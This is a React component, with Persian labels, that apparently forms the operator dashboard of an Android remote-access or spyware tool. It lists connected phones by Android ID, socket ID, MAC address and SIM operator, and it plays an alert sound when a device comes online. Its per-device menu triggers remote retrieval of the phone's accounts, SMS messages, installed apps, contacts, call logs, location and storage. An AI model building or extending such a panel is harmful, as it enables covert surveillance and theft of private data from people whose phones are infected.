import React, { useEffect, useRef, useState } from "react";
import img from "../../image/1.jpg";
import { Dropdown } from "flowbite-react";
// import { Button } from "flowbite-react";
import { MdDelete } from "react-icons/md";
import { HiOutlineCheck } from "react-icons/hi";
import { MdOutlineAccountBox } from "react-icons/md";
import { MdSms } from "react-icons/md";
import { MdSettingsApplications } from "react-icons/md";
import { IoMdContacts } from "react-icons/io";
import { IoCall } from "react-icons/io5";
import { FaLocationDot } from "react-icons/fa6";
import { MdOutlineSdStorage } from "react-icons/md";
import moment from "jalali-moment";
import "../../App.css";
import {
  Button,
  Dialog,
  DialogHeader,
  DialogBody,
  DialogFooter,
} from "@material-tailwind/react";
import NotificationSound from "./test.mp3";
import Greeting from "./Audio";
function Tbale({
  Allphones,
  BaseUrl,
  Handler_account,
  Handler_sms,
  handler_applist,
  handler_contact,
  handler_calllog,
  handler_delete,
  open,
  setOpen,
  handler_location,
  handler_storage,
  Handler_DeleteModal,
  Handeler_Update,

  Handler_SaveDeviceUserName,
  updateFieldChanged,
}) {
  const audioPlayer = useRef(null);

  async function playAudio() {
    await audioPlayer.current.play();
  }
  return (
    <>
      <tbody>
        {Allphones?.Phones &&
          Allphones?.Phones.map((item, index) => {
            return (
              <tr
                key={index}
                class="bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 dark:hover:bg-gray-600 "
              >
                <td class="w-32 py-4 text-center">
                  {(() => {
                    if (item.status == true) {
                      playAudio();
                      return (
                        <span className="bg-green-700 w-3 items-center justify-center m-auto h-3 block rounded-full"></span>
                      );
                    } else {
                      return (
                        <span className="bg-red-700 w-3 items-center justify-center m-auto h-3 block rounded-full"></span>
                      );
                    }
                  })()}
                  <Greeting
                    audioPlayer={audioPlayer}
                    NotificationSound={NotificationSound}
                  />
                </td>
                <td class="w-32 py-4 text-center">{item.ANDROID_ID}</td>
                <td class="w-32 py-4 text-center">{item.SOCKET_ID}</td>
                <td class="px-6 py-4 text-center font-semibold text-gray-900 dark:text-white">
                  {item.MacAddress}
                </td>
                <td class="px-6 py-4 text-center">{item.FINGERPRINT}</td>
                <td class="px-6 py-4 text-center">{item.MODEL}</td>
                <td class="px-6 py-4 text-center">{item.BRAND}</td>
                <td class="px-6 py-4 text-center">{item.RELEASE}</td>
                <td class="px-6 py-4 text-center">{item.SimOperatorName}</td>
                <td class="px-6 py-4 text-center">
                  <input
                    type="text"
                    className="border border-gray-400 bg-gray-200 rounded-lg text-center"
                    name="name"
                    value={item.DeviceUserName}
                    onChange={updateFieldChanged(index)}
                  />
                   <button
                    className="w-full mt-2 bg-green-200 px-4 text-green-800 ml-2 rounded-md cursor-pointer flex justify-center items-center text-lg"
                    onClick={() => Handler_SaveDeviceUserName(item.id)}
                  >
                    <HiOutlineCheck className="text-2xl" />
                  </button>
                </td>
                <td class="px-6 py-4 text-center">
                {new Intl.DateTimeFormat("fa-IR", {
                    dateStyle: "full",
                    timeStyle: "medium",
                    timeZone: "Asia/Tehran",
                  }).format(new Date(item.createdAt))}
                </td>
                <td class="px-6 py-4 text-center">
                {new Intl.DateTimeFormat("fa-IR", {
                    dateStyle: "full",
                    timeStyle: "medium",
                    timeZone: "Asia/Tehran",
                  }).format(new Date(item.online))}
                </td>
                <td class="px-6 py-4 text-center flex mt-7">
                 
                  <Dropdown
                    dir="ltr"
                    label="امکانات"
                    placement="right"
                    className="overflow-auto"
                    color="green"
                  >
                    <Dropdown.Item
                      onClick={() => Handler_account(item.SOCKET_ID)}
                    >
                      <MdOutlineAccountBox className="ml-2 text-lg" />
                      حساب ها
                    </Dropdown.Item>
                    <Dropdown.Item onClick={() => Handler_sms(item.SOCKET_ID)}>
                      <MdSms className="ml-2 text-lg" />
                      sms(پیام رسان)
                    </Dropdown.Item>
                    <Dropdown.Item
                      onClick={() => handler_applist(item.SOCKET_ID)}
                    >
                      <MdSettingsApplications className="ml-2 text-lg" />
                      لیست برنامه ها
                    </Dropdown.Item>
                    <Dropdown.Item
                      onClick={() => handler_contact(item.SOCKET_ID)}
                    >
                      <IoMdContacts className="ml-2 text-lg" />
                      لیست مخاطبین ها
                    </Dropdown.Item>
                    <Dropdown.Item
                      onClick={() => handler_calllog(item.SOCKET_ID)}
                    >
                      <IoCall className="ml-2 text-lg" />
                      لیست گزارش تماس ها
                    </Dropdown.Item>
                    <Dropdown.Item
                      onClick={() => handler_location(item.SOCKET_ID)}
                    >
                      <FaLocationDot className="ml-2 text-lg" />
                      لوکیشن
                    </Dropdown.Item>
                    <Dropdown.Item
                      onClick={() => handler_storage(item.SOCKET_ID)}
                    >
                      <MdOutlineSdStorage className="ml-2 text-lg" />
                      حافظه
                    </Dropdown.Item>
                  </Dropdown>

                  <Dialog
                    open={open}
                    handler={() => setOpen(!open)}
                    animate={{
                      mount: { scale: 1, y: 0 },
                      unmount: { scale: 0.9, y: -100 },
                    }}
                  >
                    <DialogHeader>حذف اطلاعات</DialogHeader>
                    <DialogBody className="flex items-center justify-center">
                      آیا از حذف این گزینه مطمئن هستید ؟؟؟
                      <MdDelete className="text-3xl text-red-800 mr-5" />
                    </DialogBody>
                    <DialogFooter className="">
                      <Button
                        variant="gradient"
                        color="red"
                        onClick={() => setOpen(!open)}
                        className="ml-2"
                      >
                        <span>نه </span>
                      </Button>
                      <Button
                        variant="gradient"
                        color="green"
                        onClick={() => handler_delete()}
                      >
                        <span>بله </span>
                      </Button>
                    </DialogFooter>
                  </Dialog>
                  <button
                    className="bg-red-200 px-4 text-red-800 mr-2 rounded-md cursor-pointer flex justify-center items-center text-lg"
                    onClick={() => Handler_DeleteModal(item.id)}
                  >
                    <MdDelete />
                  </button>
                  <button
                    className="bg-green-200 px-4 text-green-800 mr-2 rounded-md cursor-pointer flex justify-center items-center text-lg"
                    onClick={() => Handeler_Update(item.SOCKET_ID)}
                  >
                    بروزرسانی
                  </button>
                </td>
                {/* {enable && android === item.ANDROID_ID ? (
                    <div class="bg-indigo-900 text-center py-4 lg:px-4">
                    <div
                      class="p-2 bg-indigo-800 items-center text-indigo-100 leading-none lg:rounded-full flex lg:inline-flex"
                      role="alert"
                    >
                      <span class="flex rounded-full bg-indigo-500 uppercase px-2 py-1 text-xs font-bold mr-3">
                        جدید
                      </span>
                      <span class="font-semibold mr-2 text-left flex-auto">
                        کابر با اندروید آیدی {item.ANDROID_ID}
                      </span>
                      <svg
                        class="fill-current opacity-75 h-4 w-4"
                        xmlns="http://www.w3.org/2000/svg"
                        viewBox="0 0 20 20"
                      >
                        <path d="M12.95 10.707l.707-.707L8 4.343 6.586 5.757 10.828 10l-4.242 4.243L8 15.657l4.95-4.95z" />
                      </svg>
                    </div>
                  </div>
                  ) : (
                    null
                  )} */}
              </tr>
            );
          })}
      </tbody>
    </>
  );
}

export default Tbale;
